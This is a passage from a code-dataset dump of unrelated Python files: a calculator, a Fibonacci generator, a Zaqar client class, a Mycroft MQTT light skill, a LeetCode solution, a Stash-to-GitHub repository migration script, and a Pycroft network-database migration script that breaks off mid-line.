else:\n stack.append(tok)\n else:\n stack.append(tok)\n else:\n stack.append(tok)\n return evaluate(stack)\n \n\n def parse(s):\n # Parse the input string into tokens\n s = s.replace('+', ' + ')\n s = s.replace('-', ' - ')\n s = s.replace('*', ' * ')\n s = s.replace('/', ' / ')\n s = s.replace('(', ' ( ')\n s = s.replace(')', ' ) ')\n tokens = [int(tok) if tok.isdigit() else tok for tok in s.split() if tok.strip() != '']\n return tokens\n \n def simple(a, b, c):\n if isinstance(a, int) and isinstance(c, int): \n if b == '+':\n return a + c\n if b == '-':\n return a - c\n if b == '*':\n return a * c\n if b == '/':\n return a//c\n return None\n \n if a == '(' and c == ')' and isinstance(b, int):\n return b\n return None\n \n\n return evaluate(parse(s))\n","sub_path":"227_BasicCalculator2/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"448992434","text":"from __future__ import print_function\n\n\ndef fibs():\n a = 1\n b = 1\n while 1:\n yield a\n a, b = b, a + b\n\nif __name__ == '__main__':\n f = fibs()\n for x in xrange(100):\n print(f.next())\n","sub_path":"fibs.py","file_name":"fibs.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"219517337","text":"# Copyright (c) 2014 Red Hat, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom zaqarclient.queues.v1 import core\n\n\nclass Flavor(object):\n\n def __init__(self, client, name,\n pool, auto_create=True, **capabilities):\n self.client = client\n\n self.name = name\n self.pool = pool\n self.capabilities = capabilities\n\n if auto_create:\n self.ensure_exists()\n\n def ensure_exists(self):\n \"\"\"Ensures pool exists\n\n This method is not race safe,\n the pool could've been deleted\n right after it was called.\n \"\"\"\n req, trans = self.client._request_and_transport()\n\n data = {'pool': self.pool,\n 'capabilities': self.capabilities}\n\n core.flavor_create(trans, req, self.name, data)\n\n def delete(self):\n req, trans = self.client._request_and_transport()\n core.flavor_delete(trans, req, self.name)\n","sub_path":"zaqarclient/queues/v1/flavor.py","file_name":"flavor.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"209109865","text":"import paho.mqtt.client as mqtt\nimport time\n\n# Importing IntentBuilder\nfrom adapt.intent import IntentBuilder\n# Importing MycroftSkill class\nfrom mycroft.skills.core import MycroftSkill\n\nbathroom_topic_1 = \"lamp_1\"\nbathroom_topic_2 = \"lamp_2\"\nbathroom_topic_3 = \"lamp_3\"\n\ndef change_color(client, r, g, b, intensity, topic):\n if r != '':\n client.publish(topic, \"r\" + str(r))\n time.sleep(0.05)\n if g != '':\n client.publish(topic, \"g\" + str(g))\n time.sleep(0.05)\n if b != '':\n client.publish(topic, \"b\" + str(b))\n time.sleep(0.05)\n if intensity != '':\n client.publish(topic, \"i\" + str(intensity))\n\n# Creating HelloWorldSKill extending MycroftSkill\nclass BathroomNightLight(MycroftSkill):\n \n def __init__(self):\n super(BathroomNightLight, self).__init__(\"BathroomNightLight\")\n\n def initialize(self):\n # Creating GreetingsIntent requiring Ventilation vocab\n charging = IntentBuilder(\"LightIntent\").require(\"Light\").build()\n # Associating a callback with the Intent\n self.register_intent(charging, self.handle_charging)\n \n def handle_charging(self):\n broker_ip = \"192.168.1.198\"\n broker_port = 1883\n client_3 = mqtt.Client()\n client_3.connect(broker_ip, broker_port)\n r = 45\n g = 157\n b = 0\n i = 5\n change_color(client_3, r, g, b, i, bathroom_topic_1)\n change_color(client_3, r, g, b, i, bathroom_topic_2)\n change_color(client_3, r, g, b, i, bathroom_topic_3)\n # Sending a command to mycroft, speak Greetings Dialog\n self.speak_dialog(\"Light\")\n \n def stop(self):\n pass\n\n\ndef create_skill():\n return BathroomNightLight()","sub_path":"mycroft/turn_on_night_bathroom_light.mycroftai/.ipynb_checkpoints/__init__-checkpoint.py","file_name":"__init__-checkpoint.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"561428632","text":"#\n# @lc app=leetcode id=64 lang=python3\n#\n# [64] Minimum Path Sum\n#\n\n# @lc code=start\nclass Solution: \n def move(self, i, j):\n if i >= self.height:\n return None\n if j >= self.width:\n return None\n if i == self.height - 1 and j == self.width - 1:\n return self.grid[i][j]\n if self.ways[i][j] != None:\n return self.ways[i][j]\n down = self.move(i+1, j)\n right = self.move(i, j+1)\n if down == None and right == None:\n self.ways[i][j] = self.grid[i][j]\n elif down == None:\n self.ways[i][j] = self.grid[i][j] + right\n elif right == None:\n self.ways[i][j] = self.grid[i][j] + down\n else:\n self.ways[i][j] = self.grid[i][j] + min(down, right)\n return self.ways[i][j]\n\n\n def minPathSum(self, grid: List[List[int]]) -> int:\n self.grid = grid\n self.height = len(grid)\n if self.height == 0:\n return 0\n self.width = len(grid[0])\n if self.width == 0:\n return 0\n self.ways = []\n for i in range(self.height):\n self.ways.append([None] * self.width)\n \n return self.move(0,0)\n# @lc code=end\n\n","sub_path":"code/64.minimum-path-sum.py","file_name":"64.minimum-path-sum.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"534812724","text":"#!/usr/bin/env python3\n#\n# Copyright 2016 Brigham Young University\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport sys\nimport json\nimport requests\nimport datetime\nimport shutil\nimport yaml\nimport plac\nimport pyaml\nimport config\nimport subprocess\nfrom prompt_toolkit import prompt\nfrom slugify import slugify\n\ndef stash_rest(path, method):\n response = getattr(requests, method)('https://developer.byu.edu/repo/rest/api/1.0{}'.format(path), \n auth=(config.byu['username'], config.byu['password']))\n response.raise_for_status()\n return response\n\ndef get_groups_on_project(project_key):\n response = stash_rest('/projects/{}/permissions/groups?limit=1000'.format(project_key), 'get')\n groups = response.json()['values']\n return groups\n\ndef delete_group_from_project(project_key, group):\n try:\n stash_rest('/projects/{}/permissions/groups?name={}'.format(project_key, group), 'delete')\n except Exception as e:\n print(e)\n\ndef get_users_on_project(project_key):\n response = stash_rest('/projects/{}/permissions/users?limit=1000'.format(project_key), 'get')\n users = response.json()['values']\n return users\n\ndef delete_user_from_project(project_key, user):\n try:\n stash_rest('/projects/{}/permissions/users?name={}'.format(project_key, user), 'delete')\n except Exception as e:\n print(e)\n\ndef get_groups_on_repo(project_key, repo_slug):\n response = stash_rest('/projects/{}/repos/{}/permissions/groups?limit=1000'.format(project_key, repo_slug), 'get')\n groups = response.json()['values']\n return groups\n\ndef delete_group_from_repo(project_key, repo_slug, group):\n try:\n stash_rest('/projects/{}/repos/{}/permissions/groups?name={}'.format(project_key, repo_slug, group), 'delete')\n except Exception as e:\n print(e)\n\ndef get_users_on_repo(project_key, repo_slug):\n response = stash_rest('/projects/{}/repos/{}/permissions/users?limit=1000'.format(project_key, repo_slug), 'get')\n users = response.json()['values']\n return users\n\ndef delete_user_from_repo(project_key, repo_slug, user):\n try:\n stash_rest('/projects/{}/repos/{}/permissions/users?name={}'.format(project_key, repo_slug, user), 'delete')\n except Exception as e:\n print(e)\n\ndef remove_access_to_project(project_key):\n print('Removing all but admin access from the {} project'.format(project_key))\n stash_rest('/projects/{}/permissions/PROJECT_ADMIN/all?allow=true'.format(project_key), 'post')\n groups = get_groups_on_project(project_key)\n for group in groups:\n delete_group_from_project(project_key, group['group']['name'])\n users = get_users_on_project(project_key)\n for user in users:\n delete_user_from_project(project_key, user['user']['name'])\n\ndef remove_access_to_repo(project_key, repo_slug):\n print('Removing all but admin access from the {} {} repo'.format(project_key, repo_slug))\n groups = get_groups_on_repo(project_key, repo_slug)\n for group in groups:\n delete_group_from_repo(project_key, repo_slug, group['group']['name'])\n users = get_users_on_repo(project_key, repo_slug)\n for user in users:\n delete_user_from_repo(project_key, repo_slug, user['user']['name'])\n\ndef get_all_projects():\n \"\"\"\n projects look like {'id': 1, 'public': False, 'link': {'rel': 'self', 'url': '/projects/AAAA'}, 'name': 'ACME Project', 'description': 'ACME Project description', 'links': {'self': [{'href': 'https://developer.byu.edu/repo/projects/AAAA'}]}, 'key': 'AAAA', 'type': 'NORMAL'}\n \"\"\"\n response = stash_rest('/projects?limit=1000', 'get')\n projects = response.json()['values']\n print('Found {} projects'.format(len(projects)))\n return projects\n\ndef get_all_repos_in_project(project):\n \"\"\"\n repos look like {'scmId': 'git', 'public': False, 'name': 'acmeRepo', 'id': 2, 'project': {see project structure above}, 'links': {'clone': [{'href': 'ssh://git@pentagon7.byu.edu:7999/aaaa/acmerepo.git', 'name': 'ssh'}, {'href': 'https://@developer.byu.edu/repo/scm/aaaa/acmerepo.git', 'name': 'http'}], 'self': [{'href': 'https://developer.byu.edu/repo/projects/AAAA/repos/acmerepo/browse'}]}, 'forkable': True, 'state': 'AVAILABLE', 'statusMessage': 'Available', 'slug': 'acmerepo', 'cloneUrl': 'https://@developer.byu.edu/repo/scm/aaaa/acmerepo.git', 'link': {'rel': 'self', 'url': '/projects/AAAA/repos/acmerepo/browse'}}\n \"\"\"\n response = stash_rest('/projects/{}/repos?limit=1000'.format(project['key']), 'get')\n repos = response.json()['values']\n print('Found {} repos in the {} project'.format(len(repos), project['key']))\n return repos\n\ndef migrate():\n projects = get_all_projects()\n repo_count=0\n for project in projects:\n print(\"Working on project with key {}\".format(project['key']))\n remove_access_to_project(project['key'])\n repos = get_all_repos_in_project(project)\n for repo in repos:\n print('Working with repo {}'.format(repo['name']))\n remove_access_to_repo(project['key'], repo['slug'])\n github_repo_name = 'stash_{}_{}'.format(slugify(project['name']), slugify(repo['name']))\n if slugify(repo['name']) == slugify(project['name']):\n github_repo_name = 'stash_{}'.format(slugify(repo['name']))\n body = {'name':github_repo_name,'description':'Migrated stash project {} repo {}'.format(project['name'], repo['name']),'homepage':'https://developer.byu.edu/repo/projects/{}/repos/{}'.format(project['key'], repo['name']),'private':True,'has_issues':True,'has_wiki':True,'has_downloads':True}\n response = requests.post('https://api.github.com/orgs/byu-oit-appdev/repos', auth=(config.github['username'], config.github['password']), json=body, headers={'Content-Type': 'application/json'})\n if response.status_code != 201:\n print('Error creating repo. Status code was {} and body was {}'.format(response.status_code, response.text))\n else:\n print(' Cloning...')\n subprocess.check_call('git clone --mirror {} {}'.format(repo['cloneUrl'], github_repo_name), shell=True)\n os.chdir(github_repo_name)\n print(' Pushing to new repo...')\n subprocess.check_call('git push --mirror https://github.com/byu-oit-appdev/' + github_repo_name, shell=True)\n print(' Removing the local clone...')\n os.chdir('..')\n shutil.rmtree(github_repo_name)\n repo_count += 1\n print('{} repos added to github'.format(repo_count))\n\ndef last_commit():\n when_migrated = datetime.datetime.today() - datetime.timedelta(days=3)\n for project in get_all_projects():\n for repo in get_all_repos_in_project(project):\n try:\n response = stash_rest('/projects/{}/repos/{}/commits?limit=1'.format(project['key'], repo['slug']), 'get')\n seconds_from_epoch = float(response.json()['values'][0]['authorTimestamp'])/1000\n when_commited = datetime.datetime.utcfromtimestamp(seconds_from_epoch)\n print('Repo {} {} committed to at {}'.format(project['key'], repo['name'], when_commited))\n if when_commited > when_migrated:\n print('may have been committed to after the migration')\n print(pyaml.dump(response.json()))\n print('==========')\n except Exception as e:\n print(e)\n\ndef remove_access():\n for project in get_all_projects():\n remove_access_to_project(project['key'])\n for repo in get_all_repos_in_project(project):\n remove_access_to_repo(project['key'], repo['slug'])\n \ndef main(command):\n if command == 'migrate':\n migrate()\n elif command == 'remove_access':\n remove_access()\n elif command == 'last_commit':\n last_commit()\n\nif __name__ == '__main__':\n plac.call(main)\n","sub_path":"stash_migration.py","file_name":"stash_migration.py","file_ext":"py","file_size_in_byte":8508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"271596983","text":"import random\n\nNOMBRES = [ 'Ana','Pedro','Pablo', 'Ernesto','Ariel','Carlos','Luis','Oscar', 'Alicia','Maria','Brenda']\n\nCIUDADES = ['Managua','Masaya','Matagalpa', 'Chinandega','Somoto', 'Rivas']\n\n\ndef generar_diccionario_estudiantes():\n estudiantes = {}\n\n for nombre in NOMBRES:\n estudiantes = {\n\n 'Nombre': random.choice(NOMBRES),\n 'edad': random.randrange(16, 30),\n 'anio': random.randrange(1, 5),\n 'cuidad': random.choice(CIUDADES)\n\n }\n\n return estudiantes\n\nprint = generar_diccionario_estudiantes()\n","sub_path":"ejdiccionario3.py","file_name":"ejdiccionario3.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"504636737","text":"import countryinfo\nimport chardet\n\n# for country in countryinfo.countries:\n# \tprint country\n\n#ORIGIN ABBREVIATIONS\ncontinents = [\n{'name': ['Africa'], 'abb': ['AF']},\n{'name': ['Antarctica'], 'abb': ['AN']},\n{'name': ['Asia'], 'abb': ['AS']},\n{'name': ['Australia'], 'abb': ['AU']},\n{'name': ['Europe'], 'abb': ['EU']},\n{'name': ['North America'], 'abb': ['NA']},\n{'name': ['South America'], 'abb': ['SA']},\n{'name': ['Unknown'], 'abb': ['XX']}\n]\n\ndef getAbb(string):\n\tif isinstance(string, unicode):\n\t\tdecoded = string.decode('utf-8')\n\t\tencoded = decoded.encode('ascii')\n\tif encoded.rstrip('\\n') == \"Not Available\":\n\t\treturn 'XX'\n\tfor country in countryinfo.countries:\n\t\tif (country['name'] in encoded or encoded in country['name']):\n\t\t\tfor continent in continents:\n\t\t\t\tif continent['name'][0] in country['continent']:\n\t\t\t\t\treturn continent['abb'][0]\n\t\t\treturn 'XX'","sub_path":"origin.py","file_name":"origin.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"280846934","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2014 The Pycroft Authors. See the AUTHORS file.\n# This file is part of the Pycroft project and licensed under the terms of\n# the Apache License, Version 2.0. See the LICENSE file for details.\nfrom datetime import datetime, time\nimport ipaddr\n\nfrom mysql import session as my_session, Wheim, Nutzer, Subnet, Computer\n\nfrom pycroft import model\nfrom pycroft.model import dormitory, session, port as port_model, user, host, property, logging\nfrom pycroft.helpers.user import hash_password\nfrom pycroft.model.dns import ARecord, CNAMERecord\n\ndef do_convert():\n houses = {}\n patch_ports = []\n switch_ports = []\n rooms = []\n switches = {}\n users = []\n ips = []\n net_devices = []\n\n root_room = None\n\n for wheim in my_session.query(Wheim):\n new_house = dormitory.Dormitory(number=wheim.hausnr, short_name = wheim.kuerzel, street=wheim.str)\n houses[wheim.wheim_id] = new_house\n\n for port in wheim.port_qry():\n new_room = dormitory.Room.q.filter_by(number=port.zimmernr,\n level=port.etage,\n dormitory=new_house).first()\n if new_room is None:\n new_room = dormitory.Room(number=port.zimmernr, level=port.etage, inhabitable=True, dormitory=new_house)\n rooms.append(new_room)\n new_port = port_model.PatchPort(name=\"%s/%s\" % (port.etage, port.zimmernr), room=new_room)\n patch_ports.append(new_port)\n\n if port.ip not in switches:\n pub_ip = port.ip.replace(\"10.10\", \"141.30\")\n computer = my_session.query(Computer).filter(Computer.c_ip == pub_ip).first()\n hostname = computer.c_hname\n mac = computer.c_etheraddr\n new_switch_net_device = host.SwitchNetDevice(mac=mac)\n mgmt_ip = host.Ip(address=pub_ip, net_device=new_switch_net_device)\n new_switch = host.Switch(name=hostname, management_ip=mgmt_ip.address)\n new_switch_net_device.host = new_switch\n net_devices.append(new_switch_net_device)\n ips.append(mgmt_ip)\n switches[port.ip] = new_switch\n new_swport = port_model.SwitchPort(name=port.port, switch=switches[port.ip])\n switch_ports.append(new_swport)\n new_port.destination_port = new_swport\n\n\n if int(wheim.wheim_id) == 1 and new_room.number == \"41\" and int(new_room.level) == 1:\n root_room = new_room\n\n server_room_wu5_keller = dormitory.Room(number=\"Keller\", level=\"0\", inhabitable=False, dormitory_id=1)\n server_room_wu9_dach = dormitory.Room(number=\"Dach\", level=\"16\", inhabitable=False, dormitory_id=3)\n server_room_wu11_dach = dormitory.Room(number=\"Dach\", level=\"17\", inhabitable=False, dormitory_id=4)\n rooms += [server_room_wu11_dach, server_room_wu5_keller, server_room_wu9_dach]\n\n root = user.User(login=\"ag_dsn\", name=\"System User\", registration_date=datetime.today(), passwd_hash=hash_password(\"test\"))\n root.room = root_room\n for switch in switches.values():\n switch.user_id = root.id\n\n\n vlan_houses = {'Wu1': (5,),\n 'Wu3': (6,),\n 'Wu7': (2,),\n 'Wu11': (4,),\n 'ZellescherWeg': (7,8,9,10,11),\n 'Wu5': (1,),\n 'Wu9': (3,),\n 'UNEPWeb': (10,)}\n\n vlan_tags = {'Wu1': 11,\n 'Wu3': 13,\n 'Wu7': 17,\n 'Wu11': 5,\n 'ZellescherWeg': 41,\n 'Wu5': 15,\n 'Wu9': 19,\n 'UNEPWeb': 348}\n\n vlans = {}\n\n subnets = {}\n for subnet in my_session.query(Subnet):\n replaced_subnet_ip = subnet.net_ip.replace(\"10.10\", \"141.30\")\n new_subnet = dormitory.Subnet(address=str(ipaddr.IPv4Network(\"%s/%s\" % (replaced_subnet_ip, subnet.netmask))),\n dns_domain=subnet.domain,\n gateway=subnet.default_gateway,\n ip_type=\"4\")\n subnets[subnet.subnet_id] = new_subnet\n\n vlans[subnet.vlan_name] = dormitory.VLAN(name=subnet.vlan_name,\n tag=vlan_tags[subnet.vlan_name])\n\n new_subnet.vlans.append(vlans[subnet.vlan_name])\n for house in vlan_houses[subnet.vlan_name]:\n houses[house].vlans.append(vlans[subnet.vlan_name])\n\n for ip in ips:\n pub_ip = ip.address.replace(\"10.10\", \"141.30\")\n computer_query = my_session.query(Computer).filter(Computer.c_ip == pub_ip)\n computer = computer_query.first()\n ip.subnet = subnets[computer.c_subnet_id]\n\n\n property_groups = {\"verstoß\": property.PropertyGroup(name=u\"Verstoß\"),\n \"bewohner\": property.PropertyGroup(name=u\"Bewohner\"),\n \"admin\": property.PropertyGroup(name=u\"Admin\"),\n \"nutzerverwalter\": property.PropertyGroup(\n name=u\"Nutzerverwalter\"),\n \"finanzen\": property.PropertyGroup(name=u\"Finanzen\"),\n \"root\": property.PropertyGroup(name=u\"Root\"),\n \"hausmeister\": property.PropertyGroup(\n name=u\"Hausmeister\"),\n \"exaktiv\": property.PropertyGroup(name=u\"Exaktiv\"),\n \"tmpausgezogen\": property.PropertyGroup(\n name=u\"tmpAusgezogen\")}\n\n properties_all = [property.Property(name=\"no_internet\",\n property_group=property_groups[\"verstoß\"]),\n property.Property(name=\"internet\",\n property_group=property_groups[\"bewohner\"]),\n property.Property(name=\"mail\",\n property_group=property_groups[\"bewohner\"]),\n property.Property(name=\"ssh_helios\",\n property_group=property_groups[\"bewohner\"]),\n property.Property(name=\"homepage_helios\",\n property_group=property_groups[\"bewohner\"]),\n property.Property(name=\"no_internet\",\n property_group=property_groups[\"tmpausgezogen\"])]\n\n\n session.session.add_all(houses.values())\n session.session.add_all(patch_ports)\n session.session.add_all(rooms)\n session.session.add_all(switches.values())\n session.session.add_all(ips)\n session.session.add_all(net_devices)\n session.session.add_all(switch_ports)\n session.session.add_all(property_groups.values())\n session.session.add_all(properties_all)\n session.session.add(root)\n session.session.add_all(subnets.values())\n session.session.add_all(vlans.values())\n\n logs = []\n user_hosts = []\n user_net_devices = []\n ips = []\n a_records = []\n cname_records = []\n\n for old_user in my_session.query(Nutzer):\n user_room = dormitory.Room.q.filter_by(\n dormitory_id=houses[old_user.wheim_id].id, level=old_user.etage,\n number=old_user.zimmernr).first()\n if old_user.status in [1,2,4,5,6,7,12]:\n if user_room is not None:\n #if user_room is None:\n # print str(old_user.nutzer_id)+\" \"+str(old_user.status)+\" \"+str(houses[old_user.wheim_id].id)+\" \"+str(old_user.etage)+old_user.zimmernr\n new_user = user.User(id=old_user.nutzer_id, login=old_user.unix_account,\n name=old_user.vname + \" \" + old_user.name, room_id=user_room.id\n ,\n registration_date=datetime.combine(old_user.anmeldedatum,time()))\n\n computer = my_session.query(Computer).filter(\n Computer.nutzer_id == old_user.nutzer_id\n ).first()\n\n new_host = host.UserHost(user=new_user, room=user_room)\n user_hosts.append(new_host)\n\n new_net_device = host.UserNetDevice(mac=computer.c_etheraddr,\n host=new_host)\n user_net_devices.append(new_net_device)\n\n new_ip = host.Ip(address=computer.c_ip, net_device=new_net_device,\n subnet=subnets[computer.c_subnet_id])\n ips.append(new_ip)\n\n new_a_record = ARecord(name=computer.c_hname,\n address=new_ip, host=new_host)\n a_records.append(new_a_record)\n\n if (computer.c_alias is not None) and (len(computer.c_alias) is not 0):\n new_cname_record = CNAMERecord(name=computer.c_alias,\n record_for=new_a_record, host=new_host)\n cname_records.append(new_cname_record)\n\n if (old_user.comment is not None) and (len(old_user.comment) is not 0):\n new_log = logging.UserLogEntry(message=u\"Alte Kommentare: \"+\n unicode(old_user.comment,\n errors=\"ignore\"),\n timestamp=datetime.now(), author=root, user=new_user)\n logs.append(new_log)\n users.append(new_user)\n\n\n session.session.add_all(users)\n session.session.add_all(logs)\n session.session.add_all(user_hosts)\n session.session.add_all(user_net_devices)\n session.session.add_all(ips)\n session.session.add_all(a_records)\n session.session.add_all(cname_records)\n\n ips = []\n server_net_devices = []\n a_records = []\n server_hosts = []\n\n #Server\n #TODO subnet for 141.76 nets\n #Atlantis\n atlantis_net_device = host.ServerNetDevice(mac=\"00:e0:81:b1:3f:0e\")\n server_net_devices.append(atlantis_net_device)\n atlantis_ip_1 = host.Ip(address=\"141.30.228.39\",net_device=atlantis_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(atlantis_ip_1)\n #atlantis_ip_2 = host.Ip(address=\"141.76.119.130\",net_device=atlantis_net_device)\n #ips.append(atlantis_ip_2)\n atlantis_host = host.ServerHost(room=server_room_wu9_dach, user=root)\n atlantis_net_device.host = atlantis_host\n server_hosts.append(atlantis_host)\n atlantis_a_record = host.ARecord(host=atlantis_host, name=\"atlantis.wh2.tu-dresden.de\",\n address=atlantis_ip_1)\n a_records.append(atlantis_a_record)\n\n #Seth\n seth_net_device = host.ServerNetDevice(mac=\"00:04:23:8e:b9:91\")\n server_net_devices.append(seth_net_device)\n seth_ip_1 = host.Ip(address=\"141.30.228.2\",net_device=seth_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(seth_ip_1)\n #seth_ip_2 = host.Ip(address=\"141.76.119.134\",net_device=seth_net_device)\n #ips.append(seth_ip_2)\n seth_host = host.ServerHost(room=server_room_wu5_keller, user=root)\n seth_net_device.host = seth_host\n server_hosts.append(seth_host)\n seth_a_record = host.ARecord(host=seth_host, name=\"seth.wh2.tu-dresden.de\",\n address=seth_ip_1)\n a_records.append(seth_a_record)\n\n #Ramses\n ramses_net_device = host.ServerNetDevice(mac=\"00:04:23:9a:fe:86\")\n server_net_devices.append(ramses_net_device)\n ramses_ip = host.Ip(address=\"141.30.228.4\",net_device=ramses_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(ramses_ip)\n ramses_host = host.ServerHost(room=server_room_wu9_dach, user=root)\n ramses_net_device.host = ramses_host\n server_hosts.append(ramses_host)\n ramses_a_record = host.ARecord(host=ramses_host, name=\"ramses.wh2.tu-dresden.de\",\n address=ramses_ip)\n a_records.append(ramses_a_record)\n\n #Helios\n helios_net_device = host.ServerNetDevice(mac=\"00:e0:81:b2:d4:b0\")\n server_net_devices.append(helios_net_device)\n helios_ip = host.Ip(address=\"141.30.228.7\",net_device=helios_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(helios_ip)\n helios_host = host.ServerHost(room=server_room_wu9_dach, user=root)\n helios_net_device.host = helios_host\n server_hosts.append(helios_host)\n helios_a_record = host.ARecord(host=helios_host, name=\"helios.wh2.tu-dresden.de\",\n address=helios_ip)\n a_records.append(helios_a_record)\n\n #Gizeh\n gizeh_net_device = host.ServerNetDevice(mac=\"00:07:e9:10:d3:9a\")\n server_net_devices.append(gizeh_net_device)\n gizeh_ip = host.Ip(address=\"141.30.226.4\",net_device=gizeh_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh7.tu-dresden.de\").one())\n ips.append(gizeh_ip)\n gizeh_host = host.ServerHost(room=server_room_wu11_dach, user=root)\n gizeh_net_device.host = gizeh_host\n server_hosts.append(gizeh_host)\n gizeh_a_record = host.ARecord(host=gizeh_host, name=\"gizeh.wh7.tu-dresden.de\",\n address=gizeh_ip)\n a_records.append(gizeh_a_record)\n\n #Kerberos\n kerberos_net_device = host.ServerNetDevice(mac=\"00:04:23:dd:ee:e5\")\n server_net_devices.append(kerberos_net_device)\n kerberos_ip = host.Ip(address=\"141.30.228.3\",net_device=kerberos_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(kerberos_ip)\n kerberos_host = host.ServerHost(room=server_room_wu9_dach, user=root)\n kerberos_net_device.host = kerberos_host\n server_hosts.append(kerberos_host)\n kerberos_a_record = host.ARecord(host=kerberos_host, name=\"kerberos.wh2.tu-dresden.de\",\n address=kerberos_ip)\n a_records.append(kerberos_a_record)\n\n #radio\n radio_net_device = host.ServerNetDevice(mac=\"00:16:3e:27:c0:b3\")\n server_net_devices.append(radio_net_device)\n radio_ip = host.Ip(address=\"141.30.228.6\",net_device=radio_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(radio_ip)\n radio_host = host.ServerHost(room=server_room_wu9_dach, user=root)\n radio_net_device.host = radio_host\n server_hosts.append(radio_host)\n radio_a_record = host.ARecord(host=radio_host, name=\"radio.wh2.tu-dresden.de\",\n address=radio_ip)\n a_records.append(radio_a_record)\n\n #exma\n exma_net_device = host.ServerNetDevice(mac=\"00:16:3e:54:75:af\")\n server_net_devices.append(exma_net_device)\n exma_ip = host.Ip(address=\"141.30.228.5\",net_device=exma_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(exma_ip)\n exma_host = host.ServerHost(room=server_room_wu9_dach, user=root)\n exma_net_device.host = exma_host\n server_hosts.append(exma_host)\n exma_a_record = host.ARecord(host=exma_host, name=\"exma.wh2.tu-dresden.de\",\n address=exma_ip)\n a_records.append(exma_a_record)\n\n #projecthost\n projecthost_net_device = host.ServerNetDevice(mac=\"00:16:3e:57:b2:25\")\n server_net_devices.append(projecthost_net_device)\n projecthost_ip = host.Ip(address=\"141.30.228.10\",net_device=projecthost_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(projecthost_ip)\n projecthost_host = host.ServerHost(room=server_room_wu9_dach, user=root)\n projecthost_net_device.host = projecthost_host\n server_hosts.append(projecthost_host)\n projecthost_a_record = host.ARecord(host=projecthost_host, name=\"projecthost.wh2.tu-dresden.de\",\n address=projecthost_ip)\n a_records.append(projecthost_a_record)\n\n #linkpartner\n linkpartner_net_device = host.ServerNetDevice(mac=\"00:16:3e:cc:8a:f9\")\n server_net_devices.append(linkpartner_net_device)\n linkpartner_ip = host.Ip(address=\"141.30.228.11\",net_device=linkpartner_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(linkpartner_ip)\n linkpartner_host = host.ServerHost(room=server_room_wu9_dach, user=root)\n linkpartner_net_device.host = linkpartner_host\n server_hosts.append(linkpartner_host)\n linkpartner_a_record = host.ARecord(host=linkpartner_host, name=\"linkpartner.wh2.tu-dresden.de\",\n address=linkpartner_ip)\n a_records.append(linkpartner_a_record)\n\n #kik\n kik_net_device = host.ServerNetDevice(mac=\"00:16:3e:1f:7e:25\")\n server_net_devices.append(kik_net_device)\n kik_ip = host.Ip(address=\"141.30.228.12\",net_device=kik_net_device, subnet=dormitory.Subnet.q.filter(dormitory.Subnet.dns_domain == \"wh2.tu-dresden.de\").one())\n ips.append(kik_ip)\n kik_host = host.ServerHost(room=server_room_wu9_dach, user=root)\n kik_net_device.host = kik_host\n server_hosts.append(kik_host)\n kik_a_record = host.ARecord(host=kik_host, name=\"kik.wh2.tu-dresden.de\",\n address=kik_ip)\n a_records.append(kik_a_record)\n\n #pan\n pan_net_device_1 = host.ServerNetDevice(mac=\"00:0c:db:42:c4:00\")\n server_net_devices.append(pan_net_device_1)\n pan_net_device_2 = host.ServerNetDevice(mac=\"00:0c:db:42:c4:00\")\n server_net_devices.append(pan_net_device_2)\n pan_net_device_3 = host.ServerNetDevice(mac=\"00:0c:db:42:c4:00\")\n 